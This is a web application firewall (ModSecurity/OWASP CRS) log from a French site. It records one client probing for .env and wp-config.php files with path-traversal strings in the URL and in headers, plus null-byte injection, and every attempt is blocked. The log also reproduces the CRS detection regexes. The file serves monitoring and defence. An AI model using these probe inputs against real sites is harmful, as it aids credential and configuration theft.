[Tue May 12 05:10:32.163565 2026] [security2:error] [pid 1825179:tid 1825202] [client 45.148.10.246:21616] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "ixinabourgoin.fr"] [uri "/www/.env"] [unique_id "agKaKNr1yOh9TvizeziYzgAAAEQ"]
[Tue May 12 05:10:32.163572 2026] [:error] [pid 1825287:tid 1825326] [client 45.148.10.246:21580] File does not exist: /home/ixinabou/public_html/server-status.php
[Tue May 12 05:10:32.177241 2026] [security2:error] [pid 1820198:tid 1820222] [client 45.148.10.246:21646] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "ixinabourgoin.fr"] [uri "/health"] [unique_id "agKaKM1tk6y7yBJLpJozNgAAAJY"]
[Tue May 12 05:10:32.177280 2026] [security2:error] [pid 1820198:tid 1820222] [client 45.148.10.246:21646] ModSecurity: Warning. Found 1 byte(s) in REQUEST_HEADERS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "ixinabourgoin.fr"] [uri "/health"] [unique_id "agKaKM1tk6y7yBJLpJozNgAAAJY"]
[Tue May 12 05:10:32.177302 2026] [security2:error] [pid 1820198:tid 1820222] [client 45.148.10.246:21646] ModSecurity: Warning. Found 1 byte(s) in ARGS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "ixinabourgoin.fr"] [uri "/health"] [unique_id "agKaKM1tk6y7yBJLpJozNgAAAJY"]
[Tue May 12 05:10:32.177375 2026] [security2:error] [pid 1730175:tid 1730199] [client 45.148.10.246:21530] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /assets../../.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "ixinabourgoin.fr"] [uri "/.env.local"] [unique_id "agKaKHo6NvB9WXx5V-6nLAAAARY"]
[Tue May 12 05:10:32.177441 2026] [security2:error] [pid 1730175:tid 1730199] [client 45.148.10.246:21530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ixinabourgoin.fr"] [uri "/.env.local"] [unique_id "agKaKHo6NvB9WXx5V-6nLAAAARY"]
[Tue May 12 05:10:32.177460 2026] [security2:error] [pid 1820198:tid 1820222] [client 45.148.10.246:21646] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_HEADERS:X-Load-Config: ../../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "ixinabourgoin.fr"] [uri "/health"] [unique_id "agKaKM1tk6y7yBJLpJozNgAAAJY"]
[Tue May 12 05:10:32.177502 2026] [security2:error] [pid 1820198:tid 1820222] [client 45.148.10.246:21646] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "ixinabourgoin.fr"] [uri "/health"] [unique_id "agKaKM1tk6y7yBJLpJozNgAAAJY"]
[Tue May 12 05:10:32.177526 2026] [security2:error] [pid 1820198:tid 1820222] [client 45.148.10.246:21646] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "ixinabourgoin.fr"] [uri "/health"] [unique_id "agKaKM1tk6y7yBJLpJozNgAAAJY"]
[Tue May 12 05:10:32.177551 2026] [security2:error] [pid 1730175:tid 1730199] [client 45.148.10.246:21530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ixinabourgoin.fr"] [uri "/.env.local"] [unique_id "agKaKHo6NvB9WXx5V-6nLAAAARY"]
[Tue May 12 05:10:32.177752 2026] [security2:error] [pid 1730175:tid 1730199] [client 45.148.10.246:21530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "ixinabourgoin.fr"] [uri "/.env.local"] [unique_id "agKaKHo6NvB9WXx5V-6nLAAAARY"]
[Tue May 12 05:10:32.177808 2026] [security2:error] [pid 1820198:tid 1820222] [client 45.148.10.246:21646] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 27)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ixinabourgoin.fr"] [uri "/health"] [unique_id "agKaKM1tk6y7yBJLpJozNgAAAJY"]
[Tue May 12 05:10:32.178011 2026] [security2:error] [pid 1820198:tid 1820222] [client 45.148.10.246:21646] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 27 - SQLI=0,XSS=0,RFI=0,LFI=15,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "ixinabourgoin.fr"] [uri "/health"] [unique_id "agKaKM1tk6y7yBJLpJozNgAAAJY"]
[Tue May 12 05:10:32.180694 2026] [security2:error] [pid 1825179:tid 1825202] [client 45.148.10.246:21616] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ixinabourgoin.fr"] [uri "/.env"] [unique_id "agKaKNr1yOh9TvizeziYzwAAAEQ"]
[Tue May 12 05:10:32.180849 2026] [security2:error] [pid 1825179:tid 1825202] [client 45.148.10.246:21616] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ixinabourgoin.fr"] [uri "/.env"] [unique_id "agKaKNr1yOh9TvizeziYzwAAAEQ"]
[Tue May 12 05:10:32.181051 2026] [security2:error] [pid 1825179:tid 1825202] [client 45.148.10.246:21616] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "ixinabourgoin.fr"] [uri "/.env"] [unique_id "agKaKNr1yOh9TvizeziYzwAAAEQ"]
[Tue May 12 05:10:32.194601 2026] [security2:error] [pid 1820198:tid 1820222] [client 45.148.10.246:21646] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "ixinabourgoin.fr"] [uri "/health"] [unique_id "agKaKM1tk6y7yBJLpJozNwAAAJY"]
[Tue May 12 05:10:32.194640 2026] [security2:error] [pid 1820198:tid 1820222] [client 45.148.10.246:21646] ModSecurity: Warning. Found 1 byte(s) in REQUEST_HEADERS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "ixinabourgoin.fr"] [uri "/health"] [unique_id "agKaKM1tk6y7yBJLpJozNwAAAJY"]
[Tue May 12 05:10:32.194672 2026] [security2:error] [pid 1820198:tid 1820222] [client 45.148.10.246:21646] ModSecurity: Warning. Found 1 byte(s) in ARGS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "ixinabourgoin.fr"] [uri "/health"] [unique_id "agKaKM1tk6y7yBJLpJozNwAAAJY"]
[Tue May 12 05:10:32.194838 2026] [security2:error] [pid 1820198:tid 1820222] [client 45.148.10.246:21646] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "ixinabourgoin.fr"] [uri "/health"] [unique_id "agKaKM1tk6y7yBJLpJozNwAAAJY"]
[Tue May 12 05:10:32.194865 2026] [security2:error] [pid 1820198:tid 1820222] [client 45.148.10.246:21646] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "ixinabourgoin.fr"] [uri "/health"] [unique_id "agKaKM1tk6y7yBJLpJozNwAAAJY"]
[Tue May 12 05:10:32.195178 2026] [security2:error] [pid 1820198:tid 1820222] [client 45.148.10.246:21646] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 22)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ixinabourgoin.fr"] [uri "/health"] [unique_id "agKaKM1tk6y7yBJLpJozNwAAAJY"]
[Tue May 12 05:10:32.195369 2026] [security2:error] [pid 1820198:tid 1820222] [client 45.148.10.246:21646] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 22 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "ixinabourgoin.fr"] [uri "/health"] [unique_id "agKaKM1tk6y7yBJLpJozNwAAAJY"]
[Tue May 12 05:10:32.195861 2026] [security2:error] [pid 1730175:tid 1730199] [client 45.148.10.246:21530] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /assets../../.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "ixinabourgoin.fr"] [uri "/.env.production"] [unique_id "agKaKHo6NvB9WXx5V-6nLQAAARY"]
[Tue May 12 05:10:32.195939 2026] [security2:error] [pid 1730175:tid 1730199] [client 45.148.10.246:21530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ixinabourgoin.fr"] [uri "/.env.production"] [unique_id "agKaKHo6NvB9WXx5V-6nLQAAARY"]
[Tue May 12 05:10:32.196055 2026] [security2:error] [pid 1730175:tid 1730199] [client 45.148.10.246:21530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ixinabourgoin.fr"] [uri "/.env.production"] [unique_id "agKaKHo6NvB9WXx5V-6nLQAAARY"]
[Tue May 12 05:10:32.196237 2026] [security2:error] [pid 1730175:tid 1730199] [client 45.148.10.246:21530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "ixinabourgoin.fr"] [uri "/.env.production"] [unique_id "agKaKHo6NvB9WXx5V-6nLQAAARY"]
[Tue May 12 05:10:32.197930 2026] [security2:error] [pid 1825179:tid 1825202] [client 45.148.10.246:21616] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ixinabourgoin.fr"] [uri "/.env.local"] [unique_id "agKaKNr1yOh9TvizeziY0AAAAEQ"]
[Tue May 12 05:10:32.198108 2026] [security2:error] [pid 1825179:tid 1825202] [client 45.148.10.246:21616] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ixinabourgoin.fr"] [uri "/.env.local"] [unique_id "agKaKNr1yOh9TvizeziY0AAAAEQ"]
[Tue May 12 05:10:32.198308 2026] [security2:error] [pid 1825179:tid 1825202] [client 45.148.10.246:21616] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "ixinabourgoin.fr"] [uri "/.env.local"] [unique_id "agKaKNr1yOh9TvizeziY0AAAAEQ"]
[Tue May 12 05:10:32.212069 2026] [security2:error] [pid 1820198:tid 1820222] [client 45.148.10.246:21646] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "ixinabourgoin.fr"] [uri "/health"] [unique_id "agKaKM1tk6y7yBJLpJozOAAAAJY"]
[Tue May 12 05:10:32.212115 2026] [security2:error] [pid 1820198:tid 1820222] [client 45.148.10.246:21646] ModSecurity: Warning. Found 1 byte(s) in REQUEST_HEADERS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "ixinabourgoin.fr"] [uri "/health"] [unique_id "agKaKM1tk6y7yBJLpJozOAAAAJY"]
[Tue May 12 05:10:32.212140 2026] [security2:error] [pid 1820198:tid 1820222] [client 45.148.10.246:21646] ModSecurity: Warning. Found 1 byte(s) in ARGS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "ixinabourgoin.fr"] [uri "/health"] [unique_id "agKaKM1tk6y7yBJLpJozOAAAAJY"]
[Tue May 12 05:10:32.212573 2026] [security2:error] [pid 1820198:tid 1820222] [client 45.148.10.246:21646] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 12)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ixinabourgoin.fr"] [uri "/health"] [unique_id "agKaKM1tk6y7yBJLpJozOAAAAJY"]
[Tue May 12 05:10:32.212761 2026] [security2:error] [pid 1820198:tid 1820222] [client 45.148.10.246:21646] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 12 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Invalid character in request (null character)"] [tag "event-correlation"] [hostname "ixinabourgoin.fr"] [uri "/health"] [unique_id "agKaKM1tk6y7yBJLpJozOAAAAJY"]
[Tue May 12 05:10:32.214190 2026] [security2:error] [pid 1730175:tid 1730199] [client 45.148.10.246:21530] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /assets../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "ixinabourgoin.fr"] [uri "/wp-config.php"] [unique_id "agKaKHo6NvB9WXx5V-6nLgAAARY"]
